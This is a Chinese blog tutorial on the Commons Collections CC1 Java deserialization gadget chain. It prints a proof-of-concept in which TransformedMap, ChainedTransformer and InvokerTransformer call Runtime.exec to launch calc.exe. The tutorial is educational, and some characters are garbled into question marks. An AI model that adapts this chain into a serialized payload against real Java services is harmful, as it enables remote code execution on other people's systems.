1 java安全之CC1浅学( 二 )

1 java安全之CC1浅学

文章插图
此时只要ChainedTransformer反序列化后调用transform方法并传递任意内容即可实现rce
TransformedMapTransformedMap?于对Java标准数据结构Map做?个修饰,被修饰过的Map在添加新的元素时,将可以执??个回调 。我们通过下?这?代码对innerMap进?修饰,传出的outerMap即是修饰后的Map
Map outerMap = TransformedMap.decorate(innerMap, keyTransformer,valueTransformer);其中,keyTransformer是处理新元素的Key的回调,valueTransformer是处理新元素的value的回调 。我们这?所说的”回调“,并不是传统意义上的?个回调函数,?是?个实现了Transformer接?的类 。也就是可以调用其他的tramsform,这一点很关键
payloadpublic class CommonCollections1 {public static void main(String[] args) throws Exception {Transformer[] transformers = new Transformer[]{new ConstantTransformer(Runtime.getRuntime()),new InvokerTransformer("exec", new Class[]{String.class},new Object[]{"C:/Windows/System32/calc.exe"}),};Transformer transformerChain = new ChainedTransformer(transformers);Map innerMap = new HashMap();Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);outerMap.put("test", "xxxx");}}首先创建了?个ChainedTransformer,其中包含两个Transformer:第?个是ConstantTransformer,直接返回当前环境的Runtime对象;第?个是InvokerTransformer,执?Runtime对象的exec?法,参 数是C:/Windows/System32/calc.exe。当然,这个transformerChain只是?系列回调,我们需要?其来包装innerMap , 使?的前?说到的 TransformedMap.decorate
Map innerMap = new HashMap();Map outerMap = TransformedMap.decorate(innerMap, null, chain);最后 , 怎么触发回调呢?就是向Map中放??个新的元素:
outerMap.put("test", "xxxx");
1 java安全之CC1浅学

文章插图
小结到这儿 , 总算是有点思绪,当然,上?的代码执?demo,它只是?个?来在本地测试的类 。在实际反序列化漏洞中,我们需要将上?最终?成的outerMap对象变成?个序列化流

推荐阅读